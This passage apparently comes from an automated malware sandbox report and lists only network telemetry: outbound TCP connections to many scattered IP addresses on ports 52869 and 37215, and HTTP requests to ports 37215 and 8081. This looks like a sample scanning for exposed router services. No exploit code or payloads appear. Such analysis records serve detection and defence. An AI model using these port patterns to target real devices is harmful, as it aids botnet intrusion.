                      Source: global trafficTCP traffic: 27.166.196.109 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 118.229.110.118 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 5.53.123.92 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 195.64.245.14 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 159.144.9.230 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 147.69.83.159 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 174.197.238.28 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 206.208.92.27 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 156.230.108.50 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.235.166.187 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 135.92.41.213 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.79.29.32 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 2.32.130.76 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 199.214.91.137 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.181.146.240 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.189.55.135 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.95.255.20 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 207.223.182.162 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 142.151.185.125 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 8.98.158.174 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 82.99.109.50 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.243.91.253 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 109.99.20.37 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 4.114.3.131 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 5.116.65.190 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 185.31.200.232 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 4.194.116.48 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 37.80.86.165 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 141.204.146.101 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 137.230.50.87 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 178.197.107.190 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 148.94.230.112 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 205.185.43.251 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 8.185.133.62 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 111.240.159.157 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 205.123.120.105 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 219.98.173.195 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 73.246.68.76 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.128.21.181 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.134.157.239 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 179.205.56.53 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 57.35.73.126 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 57.92.179.211 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 91.10.179.128 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 27.181.35.71 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 129.194.41.40 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 148.211.13.100 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 34.184.40.220 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.38.235.14 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.37.107.134 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 189.63.115.173 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 180.155.132.167 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 45.81.243.55 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 24.106.184.126 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 181.22.124.66 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 179.69.185.54 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 125.76.171.252 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 108.144.159.228 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.143.196.120 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.87.181.134 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 53.10.119.110 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.126.183.244 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.236.192.253 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 195.67.134.63 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 191.79.195.70 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 65.136.207.183 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 161.203.121.55 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 117.49.51.0 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.25.86.115 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 155.161.137.123 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 75.207.187.133 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 62.55.64.143 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 17.113.8.126 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 12.208.124.228 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 178.251.54.152 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.157.99.54 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 34.125.204.132 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 129.221.27.3 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.111.60.11 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 140.186.145.164 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.43.133.194 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.169.142.207 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 14.56.224.250 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 193.145.185.252 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 119.111.170.111 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 5.128.237.130 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.69.179.157 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.5.25.5 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.66.131.124 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 87.137.214.123 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 65.187.134.17 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.217.120.155 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.221.173.151 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 143.254.34.7 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.159.88.79 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.114.18.9 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 171.24.183.17 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 161.98.32.121 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 13.188.89.36 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 182.102.31.222 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.207.21.162 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 137.222.240.86 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 100.139.82.58 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 17.113.7.103 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 132.182.11.252 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 35.181.241.197 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 205.16.116.27 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 132.162.239.115 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 19.146.91.140 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 86.49.143.0 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 198.44.25.163 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 52.163.255.26 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.73.21.156 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 169.110.124.153 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.111.74.107 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 49.39.36.55 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.65.245.105 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.141.124.157 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 49.129.212.65 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.52.45.132 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 47.65.72.63 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.12.220.171 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 217.32.33.86 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 151.105.216.154 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 205.45.42.138 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.170.128.9 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 183.49.28.217 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 78.12.26.89 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 142.34.184.106 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 194.63.61.192 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.166.85.150 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 37.248.83.223 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.23.80.245 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 104.55.221.40 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 218.185.172.90 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 13.21.178.206 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.13.56.87 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.9.160.205 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 64.86.139.164 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.9.189.63 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 113.241.155.67 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.179.185.197 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 44.181.179.103 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.120.58.162 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 99.185.208.75 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 99.136.157.100 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 77.103.233.215 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.19.255.66 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 117.76.49.30 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 73.63.7.22 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 163.91.22.99 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 66.227.30.88 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 193.94.235.184 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.226.72.201 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 34.121.126.233 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 141.147.150.132 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 80.176.127.107 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 69.74.218.35 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.17.13.46 ports 1,2,3,5,7,37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36734 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48860 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33462 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45112 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40282 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40788 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48734 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54222 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42510 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53130 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55530 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41094 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59050 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46136 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34536 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36278 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52728 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37174 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52906 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56886 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44014 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58196 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44052 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47068 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47794 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44040 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38000 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38628 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43126 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37348 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59124 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47982 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32888 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52450 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40150 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48608 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52232 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46632 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57708 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37826 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41818 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43680 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33418 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35138 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44458 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43176 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42574 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53302 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56366 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57502 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55506 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47684 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47728 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39456 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53842 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56808 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43520 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50602 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36746 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53230 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47604 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51880 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35550 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36512 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58950 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46562 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41354 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55906 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38764 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40802 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43440 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34472 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57796 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57480 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34808 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36788 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34718 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39796 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54738 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52740 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34142 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47332 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60150 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34110 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58602 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49446 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36772 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41330 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55928 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45724 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34728 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48848 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57354 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54846 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47596 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57272 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48566 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35682 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39450 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36944 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41502 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41362 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53678 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39770 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38876 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58430 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48288 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36372 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41118 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54188 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55958 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57388 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43798 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46898 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41670 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55072 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34960 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53936 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50994 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60736 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56102 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37146 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44752 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33260 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42264 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57144 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54186 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52988 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49148 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43480 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43636 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39708 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43240 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58218 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47030 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43892 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53188 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44204 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46676 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55204 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50856 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42124 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42998 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39242 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43762 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49602 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59246 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48840 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54730 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43378 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36334 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44222 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33258 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36116 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58772 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47690 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47490 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60312 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53440 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55784 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36240 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33028 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53610 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34534 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59582 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47450 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57256 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52500 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43252 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52632 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47996 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41416 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48482 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52842 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39010 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44268 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37038 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39054 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33262 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46354 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58944 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37060 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35634 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41506 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32798 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52752 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43154 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45012 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52552 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50560 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56186 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38946 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57488 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44702 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58398 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35840 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56512 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43828 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48142 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44104 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50406 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43118 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56586 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34126 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39662 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44106 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37622 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58932 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39616 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 37215
